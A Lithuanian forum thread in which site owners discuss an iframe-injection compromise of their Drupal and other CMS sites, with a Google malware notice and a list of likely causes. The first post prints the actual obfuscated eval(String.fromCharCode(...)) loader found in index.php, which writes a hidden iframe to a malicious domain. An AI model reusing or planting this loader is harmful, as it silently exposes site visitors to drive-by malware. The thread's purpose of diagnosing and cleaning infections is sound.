Iframe hack atakos

Sveiki,

vakar gan netikėtai pastebėjau, kad dalis mano Drupal-based projektų padarė *puf* su įtartinu erroru - sintaksės klaida tam tikroje eilutėje. Džiaugsmas mažas, nes, natūraliai, pirma mintis - nuhakinta, kas, savaime sugadina nuotaiką visam vakarui, jei ne ilgiau. Index.php radau šitokį džiaugsmelį:

<?php 
echo '<script type="text/javascript">eval(String.fromCharCode118,97,114,32,120,101,119,61,57,56,55,49,51,49,49,59,118,
97,114,32,103,104,103,52,53,61,34,102,111,120,105,34,59,118,97,114,32,119,61,34,1
11,110,34,59,118,97,114,32,114,101,54,61,34,115,101,114,108,46,34,59,118,97,114,3
2,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,
97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,1
05,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,
115,43,39,112,58,
47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43
,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,1
04,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,97,109,
101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,100,40,41,123,118,97,114,32,
115,61,52,51,52,53,59,125,32,118,97,114,32,114,114,101,61,56,56,50,56,51,56,50))</script>'; 
?>

Kuris, trumpai tariant, įdeda iframe su blogu tinklalapiu į index.* kodą. Gera žinia ta, kad tik tiek. Bloga, kad neįsivaizduoju, kaip nuo to saugotis ateityje, nes, kaip supratau, visas veiksmas vyksta per ftp kažkaip nuknisus slaptažodžius (keylogger?) naudojant MPac. Žodžiu, verkiu.

Išsamiausias viso šio blogio aprašymas, kokį teko rasti: http://www.softpanorama.org/Malware/Malici...me_attack.shtml

Keista tai, kad googlinant atrodo, jog šitos atakos pagrinde vyko 2007-2008 metais, tai arba man čia taip labai nepasisekė, arba vėl banga ateina. Panikos kelt nenoriu, bet, dėl visa pikta, pasitikrinkit ar nėra jūsų tinklalapio html apačioje įtartino javascripto ;)

Edit: kadangi Drupal'ą myliu, tai norėčiau paminėt, kad čia tikrai ne jo kaltė, nes kiek googlinau, tai pažeidžiami visų projektų index.* failai (Joomla, Wordpress, home-built projektėliai ir etc).

Taip dažniausiai nutinka ne del nuknistų ftp pass, bet dėl TVS'o spragų ypač opensource turi gana gražų pažeidžiamumą. Na dar vienas bajeris gali būti kad serveriukas nėra labai gerai apsaugotas. Pabandyk pas Hostingo tiekėją kreiptis gal kokius Log'us duos

Dviejuose skirtinguose servuose su trim skirtingais accountais tokia problemą jau teko atrast, tai kažin, ar servo bėda. Realiausiai atrodo mano duotoje nuoroje aprašytas variantas su kažkokiu būdu nuknistais slaptažodžiais.

Dar info: http://forums.cpanel.net/f7/solution-ifram...hack-78595.html

Taip dažniausiai nutinka ne del nuknistų ftp pass, bet dėl TVS'o spragų ypač opensource turi gana gražų pažeidžiamumą. Na dar vienas bajeris gali būti kad serveriukas nėra labai gerai apsaugotas. Pabandyk pas Hostingo tiekėją kreiptis gal kokius Log'us duos

Teko ir man susidurti, ištryniau tą kodą ir pasikeičiau FTP slaptažodį ir atrodo, kad jau nelabai kaip sakant puola

Man atrodo, čia viskas 777 permission'ų dėka :)

Turėjau ir aš problemų dėl blogos TVS kurią testavau (talpykla paveikslėlių) ir palikau serveryje, visus failus po to užkrėtė, viską pravaliau tik vieno mažai naudojamo domeno užmiršau (viskas vyko maždaug prieš savaite ar dvi), tai šiandien gavau laišką iš googlės dėl nesaugaus turinio :)

Dear site owner or webmaster of ***.lt,

We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.

 

Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):

 

http://*** .lt/

http://www.*** .lt/

 

Here is a link to a sample warning page:

http://www.google.com/interstitial?url=http%3A//***.lt/

 

We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:

 

1) the site was compromised

2) the site doesn't monitor for malicious user-contributed content

3) the site displays content from an ad network that has a malicious advertiser

If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:

http://www.stopbadware.org/home/security

 

Once you've secured your site, you can request that the warning be removed by visiting

http://www.google.com/support/webmasters/b...py?answer=45432

and requesting a review. If your site is no longer harmful to users, we will remove the warning.

 

Sincerely,

Google Search Quality Team

Aš irgi mėgstu gerti arbatą, bet dabar apie reikalus.. :D

Aukščiau aprašytos bėdos dažnai kyla dėl šių priežasčių:

1. Neteisingai sudėliotos failų prieigos teisės (CHMOD);

2. Pavogti FTP prieigos slaptažodžiai (silpnas antivirusas);

3. Techninės problemos hosterio pusėje dėl nekompetencijos

ar nesant savalaikio serverio programinės įrangos atnaujinimo;

4. Pasenusi naudojamos TVS versija, turinti jau žinomų eksploitų;

5. Nelegalūs ("Nulled") TVS variantai su koderių rašytais "priedais";

6. Svetainės tvarkymas iš ne savo kompiuterio ar internetinės kavinės;

7. Laisva fizinė prieiga kitiems žmonėms prie kompiuterio su duomenimis.

Galėčiau ir daugiau ~ tai parašyt, bet einu ko nors pasitaisyti.. Bon apetit :)